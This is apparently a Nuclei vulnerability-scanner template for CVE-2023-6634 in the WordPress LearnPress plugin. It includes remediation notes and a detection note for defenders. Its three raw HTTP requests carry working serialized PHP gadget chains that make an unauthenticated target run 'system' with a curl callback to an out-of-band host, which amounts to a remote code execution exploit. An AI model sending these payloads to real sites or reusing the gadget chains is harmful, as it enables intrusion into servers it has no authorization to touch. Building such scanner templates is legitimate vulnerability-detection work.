id: CVE-2023-6634

# Nuclei template for CVE-2023-6634 (LearnPress < 4.2.5.8). Tagged `intrusive`
# because a positive match means a command was actually executed on the target
# (out-of-band callback to the interactsh host), not just a version check.
# Remediation: upgrade the plugin to 4.2.5.8 or later (see `remediation`).
info:
  name: LearnPress < 4.2.5.8 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.
  remediation: Fixed in 4.2.5.8
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-command-injection
    - https://wpscan.com/vulnerability/909580f4-1306-4e61-ac7d-e7a2eb0961f8/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6634
    - https://plugins.trac.wordpress.org/changeset/3013957/learnpress
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6634
    cwe-id: CWE-77
    epss-score: 0.16476
    epss-percentile: 0.95874
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # Must stay in sync with the number of entries under `http[0].raw` below.
    max-request: 3
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress"
  tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive
variables:
  # Out-of-band callback target; the matcher checks that this host was hit.
  oast: "{{interactsh-url}}/?"
  padstr: "{{randstr}}"
  # Padded to a fixed width: the serialized payloads below declare a fixed
  # string length (`s:64:` = "curl " + 59 chars), so changing 59 here breaks
  # both payloads. Keep them in sync if the OAST URL format ever changes.
  finalurl: "{{padding(oast,padstr,59)}}"

http:
  # Detection note for defenders: requests to
  # /wp-json/lp/v1/load_content_via_ajax/ whose `callback` parameter names a
  # class/method pair and whose `args` carries serialized PHP (`O:`/`s:`) are
  # a strong indicator of this template or of real exploitation; the endpoint
  # is reachable unauthenticated (CVSS PR:N above).
  - raw:
      # Request 1: benign probe. Calls LP_Debug::var_dump on a random string;
      # the matcher later checks `body_1` for that string inside <pre> tags to
      # confirm the callback dispatch is reachable at all.
      - |+
        GET /wp-json/lp/v1/load_content_via_ajax/?callback={"class"%3a"LP_Debug","method"%3a"var_dump"}&args="{{randstr}}" HTTP/1.1
        Host: {{Hostname}}

      # Request 2: hands a serialized object to LP_Helper::maybe_unserialize.
      # Its side effect is `curl {{finalurl}}`, i.e. the target calls back to
      # the interactsh host. This is the intrusive step.
      - |+
        GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args="O%3a13%3a\u0022WP_HTML_Token\u0022%3a2%3a{s%3a13%3a\u0022bookmark_name\u0022%3bs%3a64%3a\u0022curl+{{finalurl}}\u0022%3bs%3a10%3a\u0022on_destroy\u0022%3bs%3a6%3a\u0022system\u0022%3b}" HTTP/1.1
        Host: {{Hostname}}
        Connection: close

      # Request 3: alternative serialized payload with the same `curl` side
      # effect; only sent if request 2 did not produce a match
      # (`stop-at-first-match`). Presumably covers a different WordPress
      # version's object graph — TODO confirm against the references.
      - |+
        GET /wp-json/lp/v1/load_content_via_ajax/?callback={"class":"LP_Helper","method":"maybe_unserialize"}&args="O%3a8%3a\u0022WP_Theme\u0022%3a2%3a{s%3a7%3a\u0022headers\u0022%3bO%3a13%3a\u0022WP_Block_List\u0022%3a2%3a{s%3a6%3a\u0022blocks\u0022%3ba%3a1%3a{s%3a4%3a\u0022Name\u0022%3ba%3a1%3a{s%3a9%3a\u0022blockName\u0022%3bs%3a12%3a\u0022Parent+Theme\u0022%3b}}s%3a8%3a\u0022registry\u0022%3bO%3a22%3a\u0022WP_Block_Type_Registry\u0022%3a1%3a{s%3a22%3a\u0022registered_block_types\u0022%3bO%3a8%3a\u0022WP_Theme\u0022%3a2%3a{s%3a7%3a\u0022headers\u0022%3bN%3bs%3a6%3a\u0022parent\u0022%3bO%3a22%3a\u0022WpOrg\\Requests\\Session\u0022%3a3%3a{s%3a3%3a\u0022url\u0022%3bs%3a10%3a\u0022http%3a//p%3a0\u0022%3bs%3a7%3a\u0022headers\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\u0022curl+{{finalurl}}\u0022%3b}s%3a7%3a\u0022options\u0022%3ba%3a1%3a{s%3a5%3a\u0022hooks\u0022%3bO%3a20%3a\u0022WpOrg\\Requests\\Hooks\u0022%3a1%3a{s%3a5%3a\u0022hooks\u0022%3ba%3a1%3a{s%3a23%3a\u0022requests.before_request\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\u0022WpOrg\\Requests\\Hooks\u0022%3a1%3a{s%3a5%3a\u0022hooks\u0022%3ba%3a1%3a{s%3a15%3a\u0022http%3a//p%3a0/Name\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\u0022system\u0022%3b}}}}i%3a1%3bs%3a8%3a\u0022dispatch\u0022%3b}}}}}}}}}}s%3a6%3a\u0022parent\u0022%3bN%3b}" HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers:
      - type: dsl
        # All four conditions must hold (`condition: and`): `body` is the
        # response to the request just sent, `body_1` the response to request
        # 1, and `interactsh_protocol` is non-empty only if the target really
        # reached the OAST host — which is the evidence of code execution.
        dsl:
          - "contains_any(interactsh_protocol, 'http', 'dns')"
          - "contains(body, 'Error: data content invalid!')"
          # Trailing space inside the quotes is part of the expression string;
          # harmless to the DSL evaluator but worth trimming on the next edit.
          - "contains(body_1, '<pre>{{randstr}}</pre>') "
          - "status_code == 200"
        condition: and
# NOTE(review): the digest below signs the template content. Any edit to this
# file — including added comments — changes what it covers, so the template
# needs re-signing or nuclei will treat it as unsigned; confirm against the
# current nuclei template-signing documentation.
# digest: 4a0a00473045022100c9994c66149f4a5bf4f57eb82447c380b3f1676950538da499834183bc73a10d022003e36af3fb7e71968c37a7a3cbde7b2fd89d97f0bc0dd4827b652838616db3ab:922c64590222798bb761d5b6d8e72950